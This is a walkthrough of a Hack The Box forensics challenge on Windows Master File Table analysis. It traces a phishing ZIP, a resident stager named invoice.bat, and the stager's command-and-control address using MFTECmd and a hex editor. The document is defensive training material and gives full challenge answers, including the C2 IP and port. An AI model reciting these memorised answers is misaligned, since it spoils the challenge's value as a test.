BFT (MFT)
The MFT Forensics Sherlock challenge introduces the fundamentals of Master File Table (MFT) analysis as part of Windows forensics. The scenario involves identifying potential malicious activity through the examination of MFT artifacts extracted from a compromised system. This challenge will equip analysts with parsing MFT data using tools like MFTeCmd, analyze the output with TimeLine Explorer, and inspect raw MFT records using a hex editor. The challenge provides a foundational understanding of filesystem-level forensic analysis on Windows systems.
KEY SKILLS AND OBJECTIVES
Learn how to use MFTECmd to parse Master File Table data.
Utilize TimeLine Explorer to visualize and analyze parsed MFT records.
Understand the structure and significance of MFT entries in forensic investigations.
Use a hex editor to inspect and recover raw file content from the MFT.
Identify suspicious file activity and reconstruct potential attack timelines based on file system metadata.
Simon Stark was targeted by attackers on February 13. He downloaded a ZIP file from a link received in an email. What was the name of the ZIP file he downloaded from the link?
PS C:\> BROWSER > https://app.hackthebox.com/tracks/Intro-to-Blue-Team
https://challenges-cdn.hackthebox.com/sherlocks/very-easy/BFT.zip?u=126831&p=mp&e=1747695726&t=1747688526&h=5d65de8816c05fedd1cb63e7f8895c25717194d442d91dbd6dbeae121d131dda
PS C:\> Invoke-WebRequest -Uri https://www.7-zip.org/a/7z2409-x64.exe -OutFile 7zip.exe
...
* install 7zip if required
PS C:\> GUI > BFT.zip > 7-zip > extract files
...
PS C:\> git clone https://github.com/EricZimmerman/MFTECmd.git
PS C:\> cd c:\Temp\MFTECmd\
PS C:\> dotnet publish -f net9.0 -r win-x64 -p:PublishSingleFile=true --self-contained true -p:IncludeNativeLibrariesForSelfExtract=true
PS C:\> cd c:\Temp\MFTECmd\MFTECmd\bin\Release\net9.0\win-x64\publish
PS C:\> Get-ChildItem
Directory: T:\00.HTB\MFTECmd\MFTECmd\bin\Release\net9.0\win-x64\publish
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/20/2025 9:27 AM 73505112 MFTECmd.exe
-a---- 5/20/2025 9:27 AM 33876 MFTECmd.pdb
PS C:\> Copy-Item T:\00.HTB\MFTECmd\MFTECmd\bin\Release\net9.0\win-x64\Publish\MFTECmd.exe "C:\users\Strife\Downloads\BFT\C\"
PS C:\> cd c:\BFT\C
PS C:\> .\MFTECMD.exe -f 'C:\Users\Strife\Downloads\BFT\C\$MFT' --csv "C:\Users\Strife\Downloads\BFT\C" --csvf mft.csv
* use single quotes IOF the shell to properly interpret the $MFT variable
PS C:\> BROWSER > https://download.ericzimmermanstools.com/net9/TimelineExplorer.zip
...
TimeLineExplorer > File > Open > mft.csv
Filters
Extension: zip
Stage-20240213T093324Z-001.zip 2024-02-13 16:34:40
KAPE.zip 2024-02-13 16:39:06
Archive.zip 2023-07-07 15:25:20
invoice.zip 2024-02-13 17:25:52
Examine the Zone Identifier contents for the initially downloaded ZIP file. This field reveals the HostUrl from where the file was downloaded, serving as a valuable Indicator of Compromise (IOC) in our investigation/analysis. What is the full Host URL from where this ZIP file was downloaded?
PS C:\> cd c:\BFT\C
PS C:\> .\MFTECMD.exe -f 'C:\Users\Strife\Downloads\BFT\C\$MFT' --csv "C:\Users\Strife\Downloads\BFT\C" --csvf mft.csv
* use single quotes IOF the shell to properly interpret the $MFT variable
PS C:\> BROWSER > https://download.ericzimmermanstools.com/net9/TimelineExplorer.zip
...
TimeLineExplorer > File > Open > mft.csv
Filters
Filename: stage Extension Zone Id Contents:
Stage-20240213T093324Z-001.zip:Zone.Identifier .Identifier [ZoneTransfer] ZoneId=3 HostUrl=https://storage.googleapis.com/drive-bulk-export-anonymous/20240213T093324.039Z/4133399871716478688/a40aecd0-1cf3-4f88-b55a-e188d5c1c04f/1/c277a8b4-afa9-4d34-b8ca-e1eb5e5f983c?authuser
* it looks like google drive was used to host the malicious fileWhat is the full path and name of the malicious file that executed malicious code and connected to a C2 server?
PS C:\> cd c:\BFT\C
PS C:\> .\MFTECMD.exe -f 'C:\Users\Strife\Downloads\BFT\C\$MFT' --csv "C:\Users\Strife\Downloads\BFT\C" --csvf mft.csv
* use single quotes IOF the shell to properly interpret the $MFT variable
PS C:\> BROWSER > https://download.ericzimmermanstools.com/net9/TimelineExplorer.zip
...
TimeLineExplorer > File > Open > mft.csv
Filters
Parent Path: stage
Created0x10: 2/13/2024
.\Users\simon.stark\Downloads\Stage-20240213T093324Z-001\Stage\invoice\invoices invoice.bat 2024-02-13 17:23:16 2024-02-13 16:38:39
* Identify all potentially suspicious files related to the malicious ZIP by
examining MFT (Master File Table) records. Focus on files with suspicious
extensions (e.g., .exe, .dll, .js, .bat, .vbs) created or modified around
the same time as the ZIP download. These may indicate payloads or execution
artifacts from the ZIPAnalyze the $Created0x30 timestamp for the previously identified file. When was this file created on disk?
PS C:\> cd c:\BFT\C
PS C:\> .\MFTECMD.exe -f 'C:\Users\Strife\Downloads\BFT\C\$MFT' --csv "C:\Users\Strife\Downloads\BFT\C" --csvf mft.csv
* use single quotes IOF the shell to properly interpret the $MFT variable
PS C:\> BROWSER > https://download.ericzimmermanstools.com/net9/TimelineExplorer.zip
...
TimeLineExplorer > File > Open > mft.csv
Filters
Parent Path: stage
Created0x10: 2/13/2024
.\Users\simon.stark\Downloads\Stage-20240213T093324Z-001\Stage\invoice\invoices invoice.bat 2024-02-13 17:23:16 2024-02-13 16:38:39
* Identify all potentially suspicious files related to the malicious ZIP by
examining MFT (Master File Table) records. Focus on files with suspicious
extensions (e.g., .exe, .dll, .js, .bat, .vbs) created or modified around
the same time as the ZIP download. These may indicate payloads or execution
artifacts from the ZIP
* the column created0x10 contains original file metadata timestamps
(like created, modified, accessed, etc.). Often the first timestamps written.
* the column created0x30 contains timestamps updated when the file is
renamed, moved, or otherwise interacted with in the file system.Finding the hex offset of an MFT record is beneficial in many investigative scenarios. Find the hex offset of the stager file from Question 3.
PS C:\> cd c:\BFT\C
PS C:\> .\MFTECMD.exe -f 'C:\Users\Strife\Downloads\BFT\C\$MFT' --csv "C:\Users\Strife\Downloads\BFT\C" --csvf mft.csv
* use single quotes IOF the shell to properly interpret the $MFT variable
PS C:\> BROWSER > https://download.ericzimmermanstools.com/net9/TimelineExplorer.zip
...
TimeLineExplorer > File > Open > mft.csv
Filters
Parent Path: stage
Created0x10: 2/13/2024
23436 .\Users\simon.stark\Downloads\Stage-20240213T093324Z-001\Stage\invoice\invoices invoice.bat 2024-02-13 17:23:16 2024-02-13 16:38:39
* Identify all potentially suspicious files related to the malicious ZIP by
examining MFT (Master File Table) records. Focus on files with suspicious
extensions (e.g., .exe, .dll, .js, .bat, .vbs) created or modified around
the same time as the ZIP download. These may indicate payloads or execution
artifacts from the ZIP
* the column created0x10 contains original file metadata timestamps
(like created, modified, accessed, etc.). Often the first timestamps written.
* the column created0x30 contains timestamps updated when the file is
renamed, moved, or otherwise interacted with in the file system.TimeLineExplorer
Filename: invoice.bat
Entry Number: 23436
Offset Formula: 1024 * 23436 = 23,998,464
PS C:\> BROWSER > https://www.rapidtables.com/convert/number/decimal-to-hex.html
From: Decimal
To: Hexadecimal
Decimal Number: 23998464
Hexadecimal: 16E3000
* each MFT record is 1024 bytes in size; multiply the entry value by 1024 to get the decimal offsetEach MFT record is 1024 bytes in size. If a file on disk has smaller size than 1024 bytes, they can be stored directly on MFT File itself. These are called MFT Resident files. During Windows File system Investigation, its crucial to look for any malicious/suspicious files that may be resident in MFT. This way we can find contents of malicious files/scripts. Find the contents of The malicious stager identified in Question3 and answer with the C2 IP and port.
PS C:\> cd c:\BFT\C
PS C:\> .\MFTECMD.exe -f 'C:\Users\Strife\Downloads\BFT\C\$MFT' --csv "C:\Users\Strife\Downloads\BFT\C" --csvf mft.csv
* use single quotes IOF the shell to properly interpret the $MFT variable
PS C:\> BROWSER > https://download.ericzimmermanstools.com/net9/TimelineExplorer.zip
...
TimeLineExplorer > File > Open > mft.csv
Filters
Parent Path: stage
Created0x10: 2/13/2024
23436 .\Users\simon.stark\Downloads\Stage-20240213T093324Z-001\Stage\invoice\invoices invoice.bat 2024-02-13 17:23:16 2024-02-13 16:38:39
* Identify all potentially suspicious files related to the malicious ZIP by
examining MFT (Master File Table) records. Focus on files with suspicious
extensions (e.g., .exe, .dll, .js, .bat, .vbs) created or modified around
the same time as the ZIP download. These may indicate payloads or execution
artifacts from the ZIP
* the column created0x10 contains original file metadata timestamps
(like created, modified, accessed, etc.). Often the first timestamps written.
* the column created0x30 contains timestamps updated when the file is
renamed, moved, or otherwise interacted with in the file system.
TimeLineExplorer
Filename: invoice.bat
Entry Number: 23436
Offset Formula: 1024 * 23436 = 23,998,464
File Size: 286
PS C:\> BROWSER > https://www.rapidtables.com/convert/number/decimal-to-hex.html
From: Decimal
To: Hexadecimal
Decimal Number: 23998464
Hexadecimal: 16E3000
* each MFT record is 1024 bytes in size; multiply the entry value by 1024 to get the decimal offset
* the batch file named invoice.bat is under 900 bytes, confirming it is a resident file stored directly within the MFT.
HexEditor > File > Open > $MFT
HexEditor > Go To > 16E3000
...
http://43.204.110.203:6666Last updated
